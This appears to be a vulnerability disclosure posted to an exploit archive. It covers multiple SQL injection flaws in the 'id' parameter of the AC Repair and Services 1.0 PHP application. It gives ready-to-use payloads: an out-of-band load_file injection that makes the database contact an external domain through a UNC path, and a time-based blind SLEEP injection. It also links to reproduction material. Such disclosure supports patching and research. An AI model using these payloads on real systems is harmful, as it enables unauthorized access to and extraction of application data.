AC Repair And Services 1.0 SQL Injection

## Title: AC Repair and Services-2023-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 05.01.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip## Reference: https://portswigger.net/web-security/sql-injection## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\ik6wj36vs4uyp5d7amwk4tdsdjjc739r0uolbcz1.namaikatiputkatatupa.com\\cbc'))+'was submitted in the id parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=services/view_service&id=1'+(selectload_file('\\\\ik6wj36vs4uyp5d7amwk4tdsdjjc739r0uolbcz1.namaikatiputkatatupa.com\\cbc'))+''AND (SELECT 6992 FROM (SELECT(SLEEP(3)))eeOg) AND 'PsSH'='PsSH---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/AC-Repair-and-Services-2023-1.0)## Proof and Exploit:[href](https://streamable.com/pfigvu)## Time spend:01:00:00